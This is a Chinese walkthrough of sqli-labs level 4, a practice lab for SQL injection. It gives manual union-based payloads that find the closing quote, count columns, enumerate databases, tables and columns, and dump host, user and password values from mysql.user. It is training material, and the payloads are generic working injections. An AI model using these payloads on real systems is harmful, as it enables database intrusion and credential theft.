SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)

前景回顾: 第三关只是使用了 ()
因此我们要将id放到(id) 并且不影响后门的sql语句只能:
id=1’) order by 1–+ 逃避规则。

  1. 判断是否存在sql注入,以及注入类型
    SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第1张图片
  2. 判断字段数
    ?id=1"order by 1–+
    SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第2张图片
    根据回显可知 此处是 ("") 双引号闭合
    POC:
?id=1") order by 4--+

SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第3张图片
可知字段数为3
3. 参数位置
POC:

?id=-1") union select 1,2,3--+                --+ 在sql中表示注释,经过url编码后 +变为空格

SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第4张图片
4. 爆库
POC:

?id=-1") union select 1,user(),version()--+
?id=-1") union select 1,2,(select schema_name from information_schema.schemata limit 0,1)--+
    concat(schema_name) from information_schema.schemata--+
     concat()函数和 limit 0,1 效果一样
?id=-1") union select 1,2,group_concat(0x7e,schema_name) from
      information_schema.schemata--+

SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第5张图片
SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第6张图片
5. 爆表
POC:

(1) ?id=-1") union select 1,2,group_concat(0x7e,table_name) 
     from information_schema.tables where table_schema='mysql'--+        
(2)                                        (select table_name from information_schema.tables
                                              where table_schema='mysql' limit 0,1)--+                  

在这里插入图片描述
SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第7张图片
limit 0-23
6. 爆字段
POC:

(1)?id=-1") union select 1,2,group_concat(0x7e,column_name) from information_schema.columns  where table_name='user'--+
(2)?id=-1") union select 1,2,(select column_name from information_schema.columns
                                             where table_name='user' limit 0,1)--+
                                                                        

SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第8张图片
SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第9张图片
7. 选择host,user,password 爆值
POC:

 ?id=-1") union select 1,2,group_concat(host,0x7e,user,0x7e,password) from mysql.user--+

SQL注入(sqli-labs)手工注入+对抗WAF+SQLMAP自动化工具(第四关)_第10张图片

你可能感兴趣的:(SQLI,数据库)